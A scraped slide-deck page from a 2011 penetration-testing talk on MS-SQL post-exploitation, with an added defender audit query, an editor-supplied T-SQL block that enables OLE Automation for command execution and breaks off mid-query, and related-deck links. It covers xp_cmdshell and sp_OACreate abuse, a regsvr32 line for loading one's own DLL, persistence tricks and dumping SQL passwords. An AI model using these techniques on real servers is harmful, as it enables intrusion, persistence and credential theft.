Everything you should already know about MS-SQL post-exploitation (slide deck, 28 slides)
ATTACK RESEARCH ADVANCED COMPUTER SECURITY RESEARCH & CONSULTING
MS-SQL Post Exploitation: Everything you should already know. Presented By: Rob Beck

Slide 1: All About Me
Name: Rob Beck (whitey)
Title: Director of Assessment
Contact: rob.beck@attackresearch.com
Background: Career pen-tester (MS/@stake/Honeywell/AR)
- Security hobbyist and researcher
- Slacker
Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com

Slide 2: What Is SQL Post-Exploitation?
The steps taken by an attacker following successful SQL access or command execution.
- Motivation or purpose
- Level of access achieved
- Amount of stealth required
- Persistence

Slide 3: Why MS-SQL Post Exploitation?
- Most pen-test resources lack details
- The explanations given are limited
- Extended functionality not covered
- Lots of don’ts without reason in hardening docs
- People still aren’t using this stuff or get stuck
- Apparently it was interesting enough for you

Slide 4
- Nothing covered in this presentation is new
- Everything presented is actively being used
- Everything presented can be prevented
- This talk assumes you have SQL access
- MS-SQL is a subject of interest, not expertise
- The subject is databases, which is boring
- Pro-tip: You might be bored

Slide 5: What’s Covered
- Utilizing SQL procedures to attack the host
- Lesser known evils (some don’ts explained)
- Credential harvesting scenario
- Potential for using the DB in attacks
- Persistence tricks

Slide 6: I Have Access, Now What?
- If you have DBO/sa you win! (There’s more to it)
  - Owning the host or just the DB
  - Persistence
- If you don’t have DBO/sa it could be research time
  - Stored procedures
  - Extended stored procedures
  - Assemblies
  - Good old fashioned exploits
- Sometimes it’s just about the data

Slide 7: Things to Consider
What’s Really Important
- Getting xp_cmdshell() – Do you need it?
- Adding accounts - Not too stealthy
- Total capabilities in the SQL instance
- Blind injection: not always so blind
- Network access to/from SQL instance
- Validity of SQL credentials elsewhere

Slide 8: Lessons Learned
Over the past year:
- 30 assessments
- 20 of them were successful due to SQL
- 0 of them detected anything wrong
- All of them neglected to restrict access
- 3 of them had blank sa account instances
- Only 5 of them had plans to upgrade to SQL 2k8
- Development environments were always BAD

Slide 9: People Are Still Running SQL As System
- Large numbers of organizations are still running SQL as NT AUTHORITY\SYSTEM
- If it’s not local system, it’s most likely still admin
- If it’s a domain account
  - Used elsewhere
  - Still likely to be system admin
- Of the small percentage who aren’t local system or admin
  - Few if any additional hardening steps are being taken
  - Shared accounts on hosts that were using privileged accounts

Slide 10: Reality
- A majority of SQL instances that exist are legacy and will be for some time
- Everything is vanilla
- Shared accounts are a certainty
- Logging is performed, but never observed
- Lack of access is usually a by-product

Slide 11: Why Are Things Broken
- People are lazy
- Nobody has the resources
- The people who make the rules
- Good enough is better than best
Slide 12: Extended Stored Procedures - The Hidden Usage
The other fun extended stored procedures:
- xp_dirtree
- xp_enumdsn
- xp_enumerrorlogs
- xp_enumgroups
- xp_fileexist*
- xp_fixeddrives
- xp_getnetname
- xp_subdirs*
- xp_regdeletekey
- xp_regdeletevalue
- xp_regread
- xp_regwrite
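A defender-side audit for the points raised on slides 7, 8 and 12 (xp_cmdshell state, blank sa, and who may call the listed extended stored procedures), added here as an example and not part of Rob Beck's deck. It assumes SQL Server 2005 or later and a sysadmin connection to the master database.

```sql
-- Added audit example (not from the slides). Assumes SQL Server 2005+,
-- run in master by a member of sysadmin.
USE master;
GO

-- Slide 7: is xp_cmdshell enabled on this instance? (value_in_use = 1 means yes)
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- Slide 8: SQL logins with a blank password; a blank sa shows up here.
-- PWDCOMPARE returns 1 when the clear-text password matches the stored hash.
SELECT name
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;

-- Slide 12: which principals hold EXECUTE (or DENY) on the "other fun"
-- extended stored procedures? A grant to public means every login can call them.
SELECT o.name                     AS procedure_name,
       ISNULL(dp.name, '(none)')  AS grantee,
       dp.type_desc               AS grantee_type,
       p.permission_name,
       p.state_desc
FROM sys.all_objects AS o
LEFT JOIN sys.database_permissions AS p
       ON p.class = 1                  -- 1 = OBJECT_OR_COLUMN
      AND p.major_id = o.object_id
LEFT JOIN sys.database_principals AS dp
       ON dp.principal_id = p.grantee_principal_id
WHERE o.type = 'X'                     -- X = extended stored procedure
  AND o.name IN ('xp_dirtree', 'xp_enumdsn', 'xp_enumerrorlogs', 'xp_enumgroups',
                 'xp_fileexist', 'xp_fixeddrives', 'xp_getnetname', 'xp_subdirs',
                 'xp_regdeletekey', 'xp_regdeletevalue', 'xp_regread', 'xp_regwrite')
ORDER BY o.name, dp.name;
```

Members of sysadmin bypass object-level grants, so the third query measures exposure to ordinary logins only; a row with grantee public is the one to act on.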

More Related Content

Viewers also liked

Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And AnalysisLalit Kale
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleNCC Group
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat ModelingMarco Morana
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsEric Vétillard
 
Security in the Internet of Things
Security in the Internet of ThingsSecurity in the Internet of Things
Security in the Internet of ThingsForgeRock
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesPierluigi Paganini
 

Viewers also liked (9)

Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
Threat Modeling And Analysis
Threat Modeling And AnalysisThreat Modeling And Analysis
Threat Modeling And Analysis
 
Real World Application Threat Modelling By Example
Real World Application Threat Modelling By ExampleReal World Application Threat Modelling By Example
Real World Application Threat Modelling By Example
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
The Internet of Things: Privacy and Security Issues
The Internet of Things: Privacy and Security IssuesThe Internet of Things: Privacy and Security Issues
The Internet of Things: Privacy and Security Issues
 
Threat Modeling for the Internet of Things
Threat Modeling for the Internet of ThingsThreat Modeling for the Internet of Things
Threat Modeling for the Internet of Things
 
Security in the Internet of Things
Security in the Internet of ThingsSecurity in the Internet of Things
Security in the Internet of Things
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issues
 

Similar to Everything you should already know about MS-SQL post-exploitation

SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
Dr3150012012202 1.getting started
Dr3150012012202 1.getting startedDr3150012012202 1.getting started
Dr3150012012202 1.getting startedNamgu Jeong
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Securing MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLSecuring MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLwolfSSL
 
MySQL server security
MySQL server securityMySQL server security
MySQL server securityDamien Seguy
 
Dear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckDear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckPaula Januszkiewicz
 
Linux questions
Linux questionsLinux questions
Linux questions1gman68
 
Connecting to my sql using PHP
Connecting to my sql using PHPConnecting to my sql using PHP
Connecting to my sql using PHPNisa Soomro
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?Gavin Holt
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Always encrypted overview
Always encrypted overviewAlways encrypted overview
Always encrypted overviewSolidQ
 
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQLNoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQLDATAVERSITY
 

Similar to Everything you should already know about MS-SQL post-exploitation (20)

SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
Dr3150012012202 1.getting started
Dr3150012012202 1.getting startedDr3150012012202 1.getting started
Dr3150012012202 1.getting started
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
Sql security
Sql securitySql security
Sql security
 
Securing MySQL with a Focus on SSL
Securing MySQL with a Focus on SSLSecuring MySQL with a Focus on SSL
Securing MySQL with a Focus on SSL
 
MySQL server security
MySQL server securityMySQL server security
MySQL server security
 
Dear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality CheckDear Hacker: Infrastructure Security Reality Check
Dear Hacker: Infrastructure Security Reality Check
 
Linux questions
Linux questionsLinux questions
Linux questions
 
Connecting to my sql using PHP
Connecting to my sql using PHPConnecting to my sql using PHP
Connecting to my sql using PHP
 
NoSQL - No Security?
NoSQL - No Security?NoSQL - No Security?
NoSQL - No Security?
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Fortress SQL Server
Fortress SQL ServerFortress SQL Server
Fortress SQL Server
 
Hardening Database Server
Hardening Database ServerHardening Database Server
Hardening Database Server
 
Always encrypted overview
Always encrypted overviewAlways encrypted overview
Always encrypted overview
 
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQLNoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
NoSQL Now! Webinar Series: Migrating Security Policies from SQL to NoSQL
 
ISSA Siem Fraud
ISSA Siem FraudISSA Siem Fraud
ISSA Siem Fraud
 
Database security2 adebiaye
Database security2 adebiayeDatabase security2 adebiaye
Database security2 adebiaye
 

More from Source Conference

iBanking - a botnet on Android
iBanking - a botnet on AndroidiBanking - a botnet on Android
iBanking - a botnet on AndroidSource Conference
 
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICI want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICSource Conference
 
From DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and BobsFrom DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and BobsSource Conference
 
Extracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus DerivativesExtracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus DerivativesSource Conference
 
How to Like Social Media Network Security
How to Like Social Media Network SecurityHow to Like Social Media Network Security
How to Like Social Media Network SecuritySource Conference
 
Wfuzz para Penetration Testers
Wfuzz para Penetration TestersWfuzz para Penetration Testers
Wfuzz para Penetration TestersSource Conference
 
Security Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSecurity Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSource Conference
 
Securty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSecurty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSource Conference
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserSource Conference
 
Advanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done ItAdvanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done ItSource Conference
 
Adapting To The Age Of Anonymous
Adapting To The Age Of AnonymousAdapting To The Age Of Anonymous
Adapting To The Age Of AnonymousSource Conference
 
Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?Source Conference
 
Advanced (persistent) binary planting
Advanced (persistent) binary plantingAdvanced (persistent) binary planting
Advanced (persistent) binary plantingSource Conference
 
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to CloudLegal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to CloudSource Conference
 
Who should the security team hire next?
Who should the security team hire next?Who should the security team hire next?
Who should the security team hire next?Source Conference
 
The Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime LawThe Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime LawSource Conference
 
How To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security SpendHow To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security SpendSource Conference
 

More from Source Conference (20)

Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
iBanking - a botnet on Android
iBanking - a botnet on AndroidiBanking - a botnet on Android
iBanking - a botnet on Android
 
I want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUICI want the next generation web here SPDY QUIC
I want the next generation web here SPDY QUIC
 
From DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and BobsFrom DNA Sequence Variation to .NET Bits and Bobs
From DNA Sequence Variation to .NET Bits and Bobs
 
Extracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus DerivativesExtracting Forensic Information From Zeus Derivatives
Extracting Forensic Information From Zeus Derivatives
 
How to Like Social Media Network Security
How to Like Social Media Network SecurityHow to Like Social Media Network Security
How to Like Social Media Network Security
 
Wfuzz para Penetration Testers
Wfuzz para Penetration TestersWfuzz para Penetration Testers
Wfuzz para Penetration Testers
 
Security Goodness with Ruby on Rails
Security Goodness with Ruby on RailsSecurity Goodness with Ruby on Rails
Security Goodness with Ruby on Rails
 
Securty Testing For RESTful Applications
Securty Testing For RESTful ApplicationsSecurty Testing For RESTful Applications
Securty Testing For RESTful Applications
 
Esteganografia
EsteganografiaEsteganografia
Esteganografia
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the Browser
 
Advanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done ItAdvanced Data Exfiltration The Way Q Would Have Done It
Advanced Data Exfiltration The Way Q Would Have Done It
 
Adapting To The Age Of Anonymous
Adapting To The Age Of AnonymousAdapting To The Age Of Anonymous
Adapting To The Age Of Anonymous
 
Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?Are Agile And Secure Development Mutually Exclusive?
Are Agile And Secure Development Mutually Exclusive?
 
Advanced (persistent) binary planting
Advanced (persistent) binary plantingAdvanced (persistent) binary planting
Advanced (persistent) binary planting
 
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to CloudLegal/technical strategies addressing data risks as perimeter shifts to Cloud
Legal/technical strategies addressing data risks as perimeter shifts to Cloud
 
Who should the security team hire next?
Who should the security team hire next?Who should the security team hire next?
Who should the security team hire next?
 
The Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime LawThe Latest Developments in Computer Crime Law
The Latest Developments in Computer Crime Law
 
JSF Security
JSF SecurityJSF Security
JSF Security
 
How To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security SpendHow To: Find The Right Amount Of Security Spend
How To: Find The Right Amount Of Security Spend
 

Recently uploaded

Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 

Everything you should already know about MS-SQL post-exploitation

  • 8. I Have Access, Now What? If you have DBO/sa you win (there's more to it): owning the host or just the DB; persistence. If you don't have DBO/sa it could be research time: stored procedures; extended stored procedures; assemblies; good old fashioned exploits. Sometimes it's just about the data. Copyright ©2011 Attack Research - 107 Central Park Square #110, Los Alamos, New Mexico 87544 - Tel: (505) 750-3007 - Email: info@attackresearch.com
  • 9. Things to Consider (what's really important): getting xp_cmdshell, do you need it?; adding accounts, not too stealthy; total capabilities in the SQL instance; blind injection, not always so blind; network access to/from the SQL instance; validity of SQL credentials elsewhere.
  • 10. Lessons Learned over the past year: 30 assessments; 20 of them were successful due to SQL; 0 of them detected anything wrong; all of them neglected to restrict access; 3 of them had blank sa account instances; only 5 of them had plans to upgrade to SQL 2k8; development environments were always BAD.
  • 11. People Are Still Running SQL As System: large numbers of organizations are still running SQL as NT AUTHORITY\SYSTEM; if it's not local system, it's most likely still admin; if it's a domain account, it's used elsewhere and still likely to be a system admin; of the small percentage who aren't local system or admin, few if any additional hardening steps are being taken; shared accounts on hosts that were using privileged accounts.
  • 12. Reality: a majority of SQL instances that exist are legacy and will be for some time; everything is vanilla; shared accounts are a certainty; logging is performed, but never observed; lack of access is usually a by-product.
  • 13. Why Are Things Broken: people are lazy; nobody has the resources; the people who make the rules; good enough is better than best.
  • 38. sp_OACreate
  • 39. Check That Advanced Options Are Enabled. If it doesn't execute, it might need some help. Each of these may require a call to sp_configure*:
        Procedure Name    Configuration Option Name
        xp_cmdshell       xp_cmdshell
        sp_OACreate       Ole Automation Procedures
        xp_sendmail       SQL Mail XPs
        * The slide adds that a query of 'UPDATE sys.configurations [..]' also does the trick; note that on SQL Server 2005 and later sys.configurations is a read-only catalog view and rejects direct UPDATEs, so sp_configure followed by RECONFIGURE is the dependable route.
  • 41. Results aren't always as easy to get as with xp_cmdshell.
  • 42. Even if procedure access is allowed, object access might not be.
  • 43. You Don't Have To Script A File Read: sp_OACreate with Scripting.FileSystemObject is nice, but it's a bit much for just reading the contents of a file. A bulk insert will usually get the job done.
  • 45. Administrator can still become SYSTEM.
  • 46. You can still operate as the SQL account.
  • 47. Some Things Require Finesse: there are limitations even to the ex-sprocs.
  • 48. Some Things Require More Finesse: WScript's RegRead would be a good choice, but... though not all failures are a bad thing (not for us).
  • 49. Forget Finesse, Go With What You Know. Finally.
  • 51. Any custom registered component.
  • 52. Why Not Register Your Own: if you can execute commands and have elevated access, why not use your own controls? -- regsvr32.exe /c <your OLE DLL/OCX>
  • 53. SQL Methods For Compiled Code. SQL provides a number of facilities for running compiled code: extended stored procedures; assemblies; OLE Automation; standard console access.
  • 54. File Locations Can Be Fun. SQL recognizes standard file paths: UNC shares are valid paths in the creation of extended stored procedures and assemblies; NTFS alternate data streams work just fine.
  • 55. SQL As An Attack Framework. Depending on the level of access, SQL makes a great attack platform: loading of compiled code modules (local files, network shares); execution of scripting resources; it facilitates the storage of results (go figure). No one ever expects the SQL instance!
  • 56. Where To Go From Here. Silly persistence tricks (the dumb stuff usually works best): triggers; the guest account; spiking the model database; ALWAYS dump the SQL passwords; data copying and backup permissioning.
  • 57. Questions?
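The command-execution path of slides 38 through 43 (and Editor's Notes 5 through 8) as one worked example. This is editor-supplied T-SQL, not code from the presentation: it assumes sysadmin on a SQL Server 2005 or later instance, that 'Ole Automation Procedures' may be switched on, and uses a placeholder output file name (out.txt) and a demo payload (whoami /all).

```sql
-- Added example (editor-supplied, not from the slides): xp_cmdshell-equivalent
-- command execution through the sp_OA* procedures, with the output read back
-- via BULK INSERT instead of scripting Scripting.FileSystemObject.
-- Assumes sysadmin (ALTER SETTINGS for sp_configure, bulkadmin for BULK INSERT).

-- Step 1: flip the switch the table on slide 39 maps to. 'show advanced options'
-- must be on first, or sp_configure reports that the option does not exist.
-- sys.configurations is read-only on 2005 and later; UPDATE against it fails,
-- so sp_configure + RECONFIGURE is the reliable route. Each change is also
-- written to the SQL Server error log ("Configuration option ... changed from 0 to 1"),
-- which is the first thing a defender should be alerting on.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

-- value_in_use is what the engine currently honours; value is the pending setting.
SELECT name, value, value_in_use
FROM sys.configurations
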